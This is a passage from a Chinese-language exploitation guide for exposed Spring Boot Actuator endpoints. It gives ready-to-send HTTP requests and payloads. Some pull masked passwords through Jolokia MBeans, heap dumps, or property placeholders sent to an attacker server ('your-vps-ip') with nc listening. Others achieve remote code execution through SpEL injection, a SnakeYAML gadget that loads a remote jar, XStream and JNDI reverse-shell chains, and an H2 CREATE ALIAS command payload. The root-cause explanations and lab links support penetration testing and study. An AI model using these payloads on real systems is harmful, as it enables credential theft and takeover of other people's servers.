<h5 id="步骤二-jolokia-调用相关-mbean-获取明文">步骤二： jolokia 调用相关 Mbean 获取明文</h5>
<p>将下面示例中的 <code>security.user.password</code> 替换为实际要获取的属性名，直接发包；明文值结果包含在 response 数据包中的 <code>value</code> 键中。</p>
<ul>
<li>调用 <code>org.springframework.boot</code> Mbean</li>
</ul>
<blockquote>
<p>实际上是调用 org.springframework.boot.admin.SpringApplicationAdminMXBeanRegistrar 类实例的 getProperty 方法</p>
</blockquote>
<p>spring 1.x</p>
<pre><code>POST /jolokia
Content-Type: application/json

{&quot;mbean&quot;: &quot;org.springframework.boot:name=SpringApplication,type=Admin&quot;,&quot;operation&quot;: &quot;getProperty&quot;, &quot;type&quot;: &quot;EXEC&quot;, &quot;arguments&quot;: [&quot;security.user.password&quot;]}
</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/jolokia
Content-Type: application/json

{&quot;mbean&quot;: &quot;org.springframework.boot:name=SpringApplication,type=Admin&quot;,&quot;operation&quot;: &quot;getProperty&quot;, &quot;type&quot;: &quot;EXEC&quot;, &quot;arguments&quot;: [&quot;security.user.password&quot;]}
</code></pre>
<ul>
<li>调用 <code>org.springframework.cloud.context.environment</code> Mbean</li>
</ul>
<blockquote>
<p>实际上是调用 org.springframework.cloud.context.environment.EnvironmentManager 类实例的 getProperty 方法</p>
</blockquote>
<p>spring 1.x</p>
<pre><code>POST /jolokia
Content-Type: application/json

{&quot;mbean&quot;: &quot;org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager&quot;,&quot;operation&quot;: &quot;getProperty&quot;, &quot;type&quot;: &quot;EXEC&quot;, &quot;arguments&quot;: [&quot;security.user.password&quot;]}
</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/jolokia
Content-Type: application/json

{&quot;mbean&quot;: &quot;org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager&quot;,&quot;operation&quot;: &quot;getProperty&quot;, &quot;type&quot;: &quot;EXEC&quot;, &quot;arguments&quot;: [&quot;security.user.password&quot;]}
</code></pre>
<ul>
<li>调用其他 Mbean</li>
</ul>
<blockquote>
<p>目标具体情况和存在的 Mbean 可能不一样，可以搜索 getProperty 等关键词，寻找可以调用的方法。</p>
</blockquote>
<h3 id="0x04获取被星号脱敏的密码的明文-方法二">0x04：获取被星号脱敏的密码的明文 (方法二)</h3>
<h4 id="利用条件-1">利用条件：</h4>
<ul>
<li>可以 GET 请求目标网站的 <code>/env</code></li>
<li>可以 POST 请求目标网站的 <code>/env</code></li>
<li>可以 POST 请求目标网站的 <code>/refresh</code> 接口刷新配置（存在 <code>spring-boot-starter-actuator</code> 依赖）</li>
<li>目标使用了 <code>spring-cloud-starter-netflix-eureka-client</code> 依赖</li>
<li>目标可以请求攻击者的服务器（请求可出外网）</li>
</ul>
<h4 id="利用方法-1">利用方法：</h4>
<h5 id="步骤一-找到想要获取的属性名-1">步骤一： 找到想要获取的属性名</h5>
<p>GET 请求目标网站的 <code>/env</code> 或 <code>/actuator/env</code> 接口，搜索 <code>******</code> 关键词，找到想要获取的被星号 * 遮掩的属性值对应的属性名。</p>
<h5 id="步骤二-使用-nc-监听-http-请求">步骤二： 使用 nc 监听 HTTP 请求</h5>
<p>在自己控制的外网服务器上监听 80 端口：</p>
<pre><code class="language-bash">nc -lvk 80
</code></pre>
<h5 id="步骤三-设置-eurekaclientserviceurldefaultzone-属性">步骤三： 设置 eureka.client.serviceUrl.defaultZone 属性</h5>
<p>将下面 <code>http://value:${security.user.password}@your-vps-ip</code>  中的  <code>security.user.password</code> 换成自己想要获取的对应的星号 * 遮掩的属性名；</p>
<p><code>your-vps-ip</code> 换成自己外网服务器的真实 ip 地址。</p>
<p>spring 1.x</p>
<pre><code>POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://value:${security.user.password}@your-vps-ip
</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/env
Content-Type: application/json

{&quot;name&quot;:&quot;eureka.client.serviceUrl.defaultZone&quot;,&quot;value&quot;:&quot;http://value:${security.user.password}@your-vps-ip&quot;}
</code></pre>
<h5 id="步骤四-刷新配置">步骤四： 刷新配置</h5>
<p>spring 1.x</p>
<pre><code>POST /refresh
Content-Type: application/x-www-form-urlencoded

</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/refresh
Content-Type: application/json

</code></pre>
<h5 id="步骤五-解码属性值">步骤五： 解码属性值</h5>
<p>正常的话，此时 nc 监听的服务器会收到目标发来的请求，其中包含类似如下 <code>Authorization</code> 头内容：</p>
<pre><code>Authorization: Basic dmFsdWU6MTIzNDU2
</code></pre>
<p>将其中的 <code>dmFsdWU6MTIzNDU2</code>部分使用 base64 解码，即可获得类似明文值 <code>value:123456</code>，其中的 <code>123456</code> 即是目标星号 * 脱敏前的属性值明文。</p>
<h3 id="0x05获取被星号脱敏的密码的明文-方法三">0x05：获取被星号脱敏的密码的明文 (方法三)</h3>
<h4 id="利用条件-2">利用条件：</h4>
<ul>
<li>通过 POST <code>/env</code> 设置属性触发目标对外网指定地址发起任意 http 请求</li>
<li>目标可以请求攻击者的服务器（请求可出外网）</li>
</ul>
<h4 id="利用方法-2">利用方法：</h4>
<blockquote>
<p>参考 UUUUnotfound 提出的 <a href="https://github.com/LandGrey/SpringBootVulExploit/issues/1">issue-1</a>，可以在目标发外部 http 请求的过程中，在 url path 中利用占位符带出数据</p>
</blockquote>
<h5 id="步骤一-找到想要获取的属性名-2">步骤一： 找到想要获取的属性名</h5>
<p>GET 请求目标网站的 <code>/env</code> 或 <code>/actuator/env</code> 接口，搜索 <code>******</code> 关键词，找到想要获取的被星号 * 遮掩的属性值对应的属性名。</p>
<h5 id="步骤二-使用-nc-监听-http-请求-1">步骤二： 使用 nc 监听 HTTP 请求</h5>
<p>在自己控制的外网服务器上监听 80 端口：</p>
<pre><code class="language-bash">nc -lvk 80
</code></pre>
<h5 id="步骤三-触发对外-http-请求">步骤三： 触发对外 http 请求</h5>
<ul>
<li><code>spring.cloud.bootstrap.location</code> 方法（<strong>同时适用于</strong>明文数据中有特殊 url 字符的情况）</li>
</ul>
<p>spring 1.x</p>
<pre><code>POST /env
Content-Type: application/x-www-form-urlencoded

spring.cloud.bootstrap.location=http://your-vps-ip/?=${security.user.password}
</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/env
Content-Type: application/json

{&quot;name&quot;:&quot;spring.cloud.bootstrap.location&quot;,&quot;value&quot;:&quot;http://your-vps-ip/?=${security.user.password}&quot;}
</code></pre>
<ul>
<li><code>eureka.client.serviceUrl.defaultZone</code> 方法（<strong>不适用于</strong>明文数据中有特殊 url 字符的情况）</li>
</ul>
<p>spring 1.x</p>
<pre><code>POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://your-vps-ip/${security.user.password}
</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/env
Content-Type: application/json

{&quot;name&quot;:&quot;eureka.client.serviceUrl.defaultZone&quot;,&quot;value&quot;:&quot;http://your-vps-ip/${security.user.password}&quot;}
</code></pre>
<h5 id="步骤四-刷新配置-1">步骤四： 刷新配置</h5>
<p>spring 1.x</p>
<pre><code>POST /refresh
Content-Type: application/x-www-form-urlencoded

</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/refresh
Content-Type: application/json

</code></pre>
<h3 id="0x06获取被星号脱敏的密码的明文-方法四">0x06：获取被星号脱敏的密码的明文 (方法四)</h3>
<blockquote>
<p>访问 /env 接口时，spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果</p>
</blockquote>
<h4 id="利用条件-3">利用条件：</h4>
<ul>
<li>可正常 GET 请求目标 <code>/heapdump</code> 或 <code>/actuator/heapdump</code> 接口</li>
</ul>
<h4 id="利用方法-3">利用方法：</h4>
<h5 id="步骤一-找到想要获取的属性名-3">步骤一： 找到想要获取的属性名</h5>
<p>GET 请求目标网站的 <code>/env</code> 或 <code>/actuator/env</code> 接口，搜索 <code>******</code> 关键词，找到想要获取的被星号 * 遮掩的属性值对应的属性名。</p>
<h5 id="步骤二-下载-jvm-heap-信息">步骤二： 下载 jvm heap 信息</h5>
<blockquote>
<p>下载的 heapdump 文件大小通常在 50M—500M 之间，有时候也可能会大于 2G</p>
</blockquote>
<p><code>GET</code> 请求目标的 <code>/heapdump</code> 或 <code>/actuator/heapdump</code> 接口，下载应用实时的 JVM 堆信息</p>
<h5 id="步骤三-使用-mat-获得-jvm-heap-中的密码明文">步骤三： 使用 MAT 获得 jvm heap 中的密码明文</h5>
<p>参考 <a href="https://landgrey.me/blog/16/">文章</a> 方法，使用 <a href="https://www.eclipse.org/mat/downloads.php">Eclipse Memory Analyzer</a> 工具的 <strong>OQL</strong> 语句</p>
<pre><code>select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains(&quot;password&quot;))

或

select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains(&quot;password&quot;))

查找apikey
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains(&quot;aliyun&quot;))

查找短信接口
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains(&quot;sms&quot;))

</code></pre>
<p>辅助用 &ldquo;<strong>password</strong>&rdquo; 等关键词快速过滤分析，获得密码等相关敏感信息的明文。</p>
<h2 id="二远程代码执行">二：远程代码执行</h2>
<blockquote>
<p>由于 spring boot 相关漏洞可能是多个组件漏洞组合导致的，所以有些漏洞名字起的不太正规，以能区分为准</p>
</blockquote>
<h3 id="0x01whitelabel-error-page-spel-rce">0x01：whitelabel error page SpEL RCE</h3>
<h4 id="利用条件-4">利用条件：</h4>
<ul>
<li>spring boot 1.1.0-1.1.12、1.2.0-1.2.7、1.3.0</li>
<li>至少知道一个触发 springboot 默认错误页面的接口及参数名</li>
</ul>
<h4 id="利用方法-4">利用方法：</h4>
<h5 id="步骤一找到一个正常传参处">步骤一：找到一个正常传参处</h5>
<p>比如发现访问  <code>/article?id=xxx</code> ，页面会报状态码为 500 的错误： <code>Whitelabel Error Page</code>，则后续 payload 都将会在参数 id 处尝试。</p>
<h5 id="步骤二执行-spel-表达式">步骤二：执行 SpEL 表达式</h5>
<p>输入 <code>/article?id=${7*7}</code> ，如果发现报错页面将 7*7 的值 49 计算出来显示在报错页面上，那么基本可以确定目标存在 SpEL 表达式注入漏洞。</p>
<p>由字符串格式转换成 <code>0x**</code> java 字节形式，方便执行任意代码：</p>
<pre><code class="language-python"># coding: utf-8

result = &quot;&quot;
target = 'open -a Calculator'
for x in target:
    result += hex(ord(x)) + &quot;,&quot;
print(result.rstrip(','))
</code></pre>
<p>执行 <code>open -a Calculator</code> 命令</p>
<pre><code class="language-java">${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}
</code></pre>
<h4 id="漏洞原理">漏洞原理：</h4>
<ol>
<li>spring boot 处理参数值出错，流程进入 <code>org.springframework.util.PropertyPlaceholderHelper</code> 类中</li>
<li>此时 URL 中的参数值会用 <code>parseStringValue</code> 方法进行递归解析</li>
<li>其中  <code>${}</code>  包围的内容都会被 <code>org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration</code> 类的 <code>resolvePlaceholder</code> 方法当作 SpEL 表达式被解析执行，造成 RCE 漏洞</li>
</ol>
<h4 id="漏洞分析">漏洞分析：</h4>
<p>​	<a href="https://www.cnblogs.com/litlife/p/10183137.html">SpringBoot SpEL表达式注入漏洞-分析与复现</a></p>
<h4 id="漏洞环境">漏洞环境：</h4>
<p><a href="https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce">repository/springboot-spel-rce</a></p>
<p>正常访问：</p>
<pre><code>http://127.0.0.1:9091/article?id=66
</code></pre>
<p>执行 <code>open -a Calculator</code> 命令：</p>
<pre><code class="language-java">http://127.0.0.1:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}
</code></pre>
<h3 id="0x02spring-cloud-snakeyaml-rce">0x02：spring cloud SnakeYAML RCE</h3>
<h4 id="利用条件-5">利用条件：</h4>
<ul>
<li>可以 POST 请求目标网站的 <code>/env</code> 接口设置属性</li>
<li>可以 POST 请求目标网站的 <code>/refresh</code> 接口刷新配置（存在 <code>spring-boot-starter-actuator</code> 依赖）</li>
<li>目标依赖的 <code>spring-cloud-starter</code> 版本 &lt; 1.3.0.RELEASE</li>
<li>目标可以请求攻击者的 HTTP 服务器（请求可出外网）</li>
</ul>
<h4 id="利用方法-5">利用方法：</h4>
<h5 id="步骤一-托管-yml-和-jar-文件">步骤一： 托管 yml 和 jar 文件</h5>
<p>在自己控制的 vps 机器上开启一个简单 HTTP 服务器，端口尽量使用常见 HTTP 服务端口（80、443）</p>
<pre><code class="language-bash"># 使用 python 快速开启 http server

python2 -m SimpleHTTPServer 80
python3 -m http.server 80
</code></pre>
<p>在网站根目录下放置后缀为 <code>yml</code> 的文件  <code>example.yml</code>，内容如下：</p>
<pre><code class="language-yaml">!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL [&quot;http://your-vps-ip/example.jar&quot;]
  ]]
]
</code></pre>
<p>在网站根目录下放置后缀为 <code>jar</code> 的文件  <code>example.jar</code>，内容是要执行的代码，代码编写及编译方式参考 <a href="https://github.com/artsploit/yaml-payload">yaml-payload</a>。</p>
<h5 id="步骤二-设置-springcloudbootstraplocation-属性">步骤二： 设置 spring.cloud.bootstrap.location 属性</h5>
<p>spring 1.x</p>
<pre><code>POST /env
Content-Type: application/x-www-form-urlencoded

spring.cloud.bootstrap.location=http://your-vps-ip/example.yml
</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/env
Content-Type: application/json

{&quot;name&quot;:&quot;spring.cloud.bootstrap.location&quot;,&quot;value&quot;:&quot;http://your-vps-ip/example.yml&quot;}
</code></pre>
<h5 id="步骤三-刷新配置">步骤三： 刷新配置</h5>
<p>spring 1.x</p>
<pre><code>POST /refresh
Content-Type: application/x-www-form-urlencoded

</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/refresh
Content-Type: application/json

</code></pre>
<h4 id="漏洞原理-1">漏洞原理：</h4>
<ol>
<li>spring.cloud.bootstrap.location 属性被设置为外部恶意 yml 文件 URL 地址</li>
<li>refresh 触发目标机器请求远程 HTTP 服务器上的 yml 文件，获得其内容</li>
<li>SnakeYAML 由于存在反序列化漏洞，所以解析恶意 yml 内容时会完成指定的动作</li>
<li>先是触发 java.net.URL 去拉取远程 HTTP 服务器上的恶意 jar 文件</li>
<li>然后是寻找 jar 文件中实现 javax.script.ScriptEngineFactory 接口的类并实例化</li>
<li>实例化类时执行恶意代码，造成 RCE 漏洞</li>
</ol>
<h4 id="漏洞分析-1">漏洞分析：</h4>
<p>​	<a href="https://b1ngz.github.io/exploit-spring-boot-actuator-spring-cloud-env-note/">Exploit Spring Boot Actuator 之 Spring Cloud Env 学习笔记</a></p>
<h4 id="漏洞环境-1">漏洞环境：</h4>
<p><a href="https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springcloud-snakeyaml-rce">repository/springcloud-snakeyaml-rce</a></p>
<p>正常访问：</p>
<pre><code>http://127.0.0.1:9092/env
</code></pre>
<h3 id="0x03eureka-xstream-deserialization-rce">0x03：eureka xstream deserialization RCE</h3>
<h4 id="利用条件-6">利用条件：</h4>
<ul>
<li>可以 POST 请求目标网站的 <code>/env</code> 接口设置属性</li>
<li>可以 POST 请求目标网站的 <code>/refresh</code> 接口刷新配置（存在 <code>spring-boot-starter-actuator</code> 依赖）</li>
<li>目标使用的  <code>eureka-client</code> &lt; 1.8.7（通常包含在 <code>spring-cloud-starter-netflix-eureka-client</code> 依赖中）</li>
<li>目标可以请求攻击者的 HTTP 服务器（请求可出外网）</li>
</ul>
<h4 id="利用方法-6">利用方法：</h4>
<h5 id="步骤一架设响应恶意-xstream-payload-的网站">步骤一：架设响应恶意 XStream payload 的网站</h5>
<p>提供一个依赖 Flask 并符合要求的 <a href="https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-xstream-rce.py">python 脚本示例</a>，作用是利用目标 Linux 机器上自带的 python 来反弹shell。</p>
<p>使用 python 在自己控制的服务器上运行以上的脚本，并根据实际情况修改脚本中反弹 shell 的 ip 地址和 端口号。</p>
<h5 id="步骤二监听反弹-shell-的端口">步骤二：监听反弹 shell 的端口</h5>
<p>一般使用 nc 监听端口，等待反弹 shell</p>
<pre><code class="language-bash">nc -lvp 443
</code></pre>
<h5 id="步骤三设置-eurekaclientserviceurldefaultzone-属性">步骤三：设置 eureka.client.serviceUrl.defaultZone 属性</h5>
<p>spring 1.x</p>
<pre><code>POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://your-vps-ip/example
</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/env
Content-Type: application/json

{&quot;name&quot;:&quot;eureka.client.serviceUrl.defaultZone&quot;,&quot;value&quot;:&quot;http://your-vps-ip/example&quot;}
</code></pre>
<h5 id="步骤四刷新配置">步骤四：刷新配置</h5>
<p>spring 1.x</p>
<pre><code>POST /refresh
Content-Type: application/x-www-form-urlencoded

</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/refresh
Content-Type: application/json

</code></pre>
<h4 id="漏洞原理-2">漏洞原理：</h4>
<ol>
<li>eureka.client.serviceUrl.defaultZone 属性被设置为恶意的外部 eureka server URL 地址</li>
<li>refresh 触发目标机器请求远程 URL，提前架设的 fake eureka server 就会返回恶意的 payload</li>
<li>目标机器相关依赖解析 payload，触发 XStream 反序列化，造成 RCE 漏洞</li>
</ol>
<h4 id="漏洞分析-2">漏洞分析：</h4>
<p>​	<a href="https://www.freebuf.com/column/234719.html">Spring Boot Actuator从未授权访问到getshell</a></p>
<h4 id="漏洞环境-2">漏洞环境：</h4>
<p><a href="https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-eureka-xstream-rce">repository/springboot-eureka-xstream-rce</a></p>
<p>正常访问：</p>
<pre><code>http://127.0.0.1:9093/env
</code></pre>
<h3 id="0x04jolokia-logback-jndi-rce">0x04：jolokia logback JNDI RCE</h3>
<h4 id="利用条件-7">利用条件：</h4>
<ul>
<li>
<p>目标网站存在 <code>/jolokia</code> 或 <code>/actuator/jolokia</code> 接口</p>
</li>
<li>
<p>目标使用了 <code>jolokia-core</code> 依赖（版本要求暂未知）并且环境中存在相关 MBean</p>
</li>
<li>
<p>目标可以请求攻击者的 HTTP 服务器（请求可出外网）</p>
</li>
<li>
<p>普通 JNDI 注入受目标 JDK 版本影响，jdk &lt; 6u201/7u191/8u182/11.0.1(LDAP)，但相关环境可绕过</p>
</li>
</ul>
<h4 id="利用方法-7">利用方法：</h4>
<h5 id="步骤一查看已存在的-mbeans">步骤一：查看已存在的 MBeans</h5>
<p>访问 <code>/jolokia/list</code> 接口，查看是否存在 <code>ch.qos.logback.classic.jmx.JMXConfigurator</code> 和 <code>reloadByURL</code> 关键词。</p>
<h5 id="步骤二托管-xml-文件">步骤二：托管 xml 文件</h5>
<p>在自己控制的 vps 机器上开启一个简单 HTTP 服务器，端口尽量使用常见 HTTP 服务端口（80、443）</p>
<pre><code class="language-bash"># 使用 python 快速开启 http server

python2 -m SimpleHTTPServer 80
python3 -m http.server 80
</code></pre>
<p>在根目录放置以 <code>xml</code> 结尾的 <code>example.xml</code>  文件，内容如下：</p>
<pre><code class="language-xml">&lt;configuration&gt;
  &lt;insertFromJNDI env-entry-name=&quot;ldap://your-vps-ip:1389/JNDIObject&quot; as=&quot;appName&quot; /&gt;
&lt;/configuration&gt;
</code></pre>
<h5 id="步骤三准备要执行的-java-代码">步骤三：准备要执行的 Java 代码</h5>
<p>编写优化过后的用来反弹 shell 的 <a href="https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/JNDIObject.java">Java 示例代码</a>  <code>JNDIObject.java</code>，</p>
<p>使用兼容低版本 jdk 的方式编译：</p>
<pre><code class="language-bash">javac -source 1.5 -target 1.5 JNDIObject.java
</code></pre>
<p>然后将生成的 <code>JNDIObject.class</code> 文件拷贝到 <strong>步骤二</strong> 中的网站根目录。</p>
<h5 id="步骤四架设恶意-ldap-服务">步骤四：架设恶意 ldap 服务</h5>
<p>下载 <a href="https://github.com/mbechler/marshalsec">marshalsec</a> ，使用下面命令架设对应的 ldap 服务：</p>
<pre><code class="language-bash">java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389
</code></pre>
<h5 id="步骤五监听反弹-shell-的端口">步骤五：监听反弹 shell 的端口</h5>
<p>一般使用 nc 监听端口，等待反弹 shell</p>
<pre><code class="language-bash">nc -lv 443
</code></pre>
<h5 id="步骤六从外部-url-地址加载日志配置文件">步骤六：从外部 URL 地址加载日志配置文件</h5>
<blockquote>
<p>⚠️ 如果目标成功请求了example.xml 并且 marshalsec 也接收到了目标请求，但是目标没有请求 JNDIObject.class，大概率是因为目标环境的 jdk 版本太高，导致 JNDI 利用失败。</p>
</blockquote>
<p>替换实际的 your-vps-ip 地址访问 URL 触发漏洞：</p>
<pre><code>/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/your-vps-ip!/example.xml
</code></pre>
<h4 id="漏洞原理-3">漏洞原理：</h4>
<ol>
<li>直接访问可触发漏洞的 URL，相当于通过 jolokia 调用 <code>ch.qos.logback.classic.jmx.JMXConfigurator</code> 类的 <code>reloadByURL</code> 方法</li>
<li>目标机器请求外部日志配置文件 URL 地址，获得恶意 xml 文件内容</li>
<li>目标机器使用 saxParser.parse 解析 xml 文件 (这里导致了 xxe 漏洞)</li>
<li>xml 文件中利用 <code>logback</code> 依赖的 <code>insertFormJNDI</code> 标签，设置了外部 JNDI 服务器地址</li>
<li>目标机器请求恶意  JNDI 服务器，导致 JNDI 注入，造成 RCE 漏洞</li>
</ol>
<h4 id="漏洞分析-3">漏洞分析：</h4>
<p>​	<a href="https://xz.aliyun.com/t/4258">spring boot actuator rce via jolokia</a></p>
<h4 id="漏洞环境-3">漏洞环境：</h4>
<p><a href="https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-jolokia-logback-rce">repository/springboot-jolokia-logback-rce</a></p>
<p>正常访问：</p>
<pre><code>http://127.0.0.1:9094/env
</code></pre>
<h3 id="0x05jolokia-realm-jndi-rce">0x05：jolokia Realm JNDI RCE</h3>
<h4 id="利用条件-8">利用条件：</h4>
<ul>
<li>目标网站存在 <code>/jolokia</code> 或 <code>/actuator/jolokia</code> 接口</li>
<li>目标使用了 <code>jolokia-core</code> 依赖（版本要求暂未知）并且环境中存在相关 MBean</li>
<li>目标可以请求攻击者的服务器（请求可出外网）</li>
<li>普通 JNDI 注入受目标 JDK 版本影响，jdk &lt; 6u141/7u131/8u121(RMI)，但相关环境可绕过</li>
</ul>
<h4 id="利用方法-8">利用方法：</h4>
<h5 id="步骤一查看已存在的-mbeans-1">步骤一：查看已存在的 MBeans</h5>
<p>访问 <code>/jolokia/list</code> 接口，查看是否存在 <code>type=MBeanFactory</code> 和 <code>createJNDIRealm</code> 关键词。</p>
<h5 id="步骤二准备要执行的-java-代码">步骤二：准备要执行的 Java 代码</h5>
<p>编写优化过后的用来反弹 shell 的 <a href="https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/JNDIObject.java">Java 示例代码</a>  <code>JNDIObject.java</code>。</p>
<h5 id="步骤三托管-class-文件">步骤三：托管 class 文件</h5>
<p>在自己控制的 vps 机器上开启一个简单 HTTP 服务器，端口尽量使用常见 HTTP 服务端口（80、443）</p>
<pre><code class="language-bash"># 使用 python 快速开启 http server

python2 -m SimpleHTTPServer 80
python3 -m http.server 80
</code></pre>
<p>将<strong>步骤二</strong>中编译好的 class 文件拷贝到 HTTP 服务器根目录。</p>
<h5 id="步骤四架设恶意-rmi-服务">步骤四：架设恶意 rmi 服务</h5>
<p>下载 <a href="https://github.com/mbechler/marshalsec">marshalsec</a> ，使用下面命令架设对应的 rmi 服务：</p>
<pre><code class="language-bash">java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://your-vps-ip:80/#JNDIObject 1389
</code></pre>
<h5 id="步骤五监听反弹-shell-的端口-1">步骤五：监听反弹 shell 的端口</h5>
<p>一般使用 nc 监听端口，等待反弹 shell</p>
<pre><code class="language-bash">nc -lvp 443
</code></pre>
<h5 id="步骤六发送恶意-payload">步骤六：发送恶意 payload</h5>
<p>根据实际情况修改 <a href="https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-realm-jndi-rce.py">springboot-realm-jndi-rce.py</a> 脚本中的目标地址，RMI 地址、端口等信息，然后在自己控制的服务器上运行。</p>
<h4 id="漏洞原理-4">漏洞原理：</h4>
<ol>
<li>利用 jolokia 调用 createJNDIRealm 创建 JNDIRealm</li>
<li>设置 connectionURL 地址为 RMI Service URL</li>
<li>设置 contextFactory 为 RegistryContextFactory</li>
<li>停止 Realm</li>
<li>启动 Realm 以触发指定 RMI 地址的  JNDI 注入，造成 RCE 漏洞</li>
</ol>
<h4 id="漏洞分析-4">漏洞分析：</h4>
<p>​	<a href="https://static.anquanke.com/download/b/security-geek-2019-q1/article-10.html">Yet Another Way to Exploit Spring Boot Actuators via Jolokia</a></p>
<h4 id="漏洞环境-4">漏洞环境：</h4>
<p><a href="https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-jolokia-logback-rce">repository/springboot-jolokia-logback-rce</a></p>
<p>正常访问：</p>
<pre><code>http://127.0.0.1:9094/env
</code></pre>
<h3 id="0x06restart-h2-database-query-rce">0x06：restart h2 database query RCE</h3>
<h4 id="利用条件-9">利用条件：</h4>
<ul>
<li>可以 POST 请求目标网站的 <code>/env</code> 接口设置属性</li>
<li>可以 POST 请求目标网站的 <code>/restart</code> 接口重启应用</li>
<li>存在 <code>com.h2database.h2</code> 依赖（版本要求暂未知）</li>
</ul>
<h4 id="利用方法-9">利用方法：</h4>
<h5 id="步骤一设置-springdatasourcehikariconnection-test-query-属性">步骤一：设置 spring.datasource.hikari.connection-test-query 属性</h5>
<blockquote>
<p>⚠️ 下面payload 中的 &lsquo;T5&rsquo; 方法每一次执行命令后都需要更换名称 (如 T6) ，然后才能被重新创建使用，否则下次 restart 重启应用时漏洞不会被触发</p>
</blockquote>
<p>spring 1.x（无回显执行命令）</p>
<pre><code>POST /env
Content-Type: application/x-www-form-urlencoded

spring.datasource.hikari.connection-test-query=CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');
</code></pre>
<p>spring 2.x（无回显执行命令）</p>
<pre><code>POST /actuator/env
Content-Type: application/json

{&quot;name&quot;:&quot;spring.datasource.hikari.connection-test-query&quot;,&quot;value&quot;:&quot;CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');&quot;}
</code></pre>
<h5 id="步骤二重启应用">步骤二：重启应用</h5>
<p>spring 1.x</p>
<pre><code>POST /restart
Content-Type: application/x-www-form-urlencoded

</code></pre>
<p>spring 2.x</p>
<pre><code>POST /actuator/restart
Content-Type: application/json

</code></pre>
<h4 id="漏洞原理-5">漏洞原理：</h4>
<ol>
<li>spring.datasource.hikari.connection-test-query 属性被设置为一条恶意的 <code>CREATE ALIAS</code> 创建自定义函数的 SQL 语句</li>
<li>其属性对应 HikariCP 数据库连接池的 connectionTestQuery 配置，定义一个新数据库连接之前被执行的 SQL 语句</li>
<li>restart 重启应用，会建立新的数据库连接</li>
<li>如果 SQL 语句中的自定义函数还没有被执行过，那么自定义函数就会被执行，造成 RCE 漏洞</li>
</ol>
<h4 id="漏洞分析-5">漏洞分析：</h4>
<p>​	<a href="https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database">remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database</a></p>
<h4 id="漏洞环境-5">漏洞环境：</h4>
<p><a href="https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-h2-database-rce">repository/springboot-h2-database-rce</a></p>
<p>正常访问：</p>
<pre><code>http://127.0.0.1:9096/actuator/env
</code></pre>
<h3 id="0x07h2-database-console-jndi-rce">0x07：h2 database console JNDI RCE</h3>
<h4 id="利用条件-10">利用条件：</h4>
<ul>
<li>存在 <code>com.h2database.h2</code> 依赖（版本要求暂未知）</li>
<li>spring 配置中启用 h2 console  <code>spring.h2.console.enabled=true</code></li>
<li>目标可以请求攻击者的服务器（请求可出外网）</li>
<li>JNDI 注入受目标 JDK 版本影响，jdk &lt; 6u201/7u191/8u182/11.0.1（LDAP 方式）</li>
</ul>
<h4 id="利用方法-10">利用方法：</h4>
<h5 id="步骤一访问路由获得-jsessionid">步骤一：访问路由获得 jsessionid</h5>
<p>直接访问目标开启 h2 console 的默认路由 <code>/h2-console</code>，目标会跳转到页面 <code>/h2-console/login.jsp?jsessionid=xxxxxx</code>，记录下实际的 <code>jsessionid=xxxxxx</code> 值。</p>
<h5 id="步骤二准备要执行的-java-代码-1">步骤二：准备要执行的 Java 代码</h5>
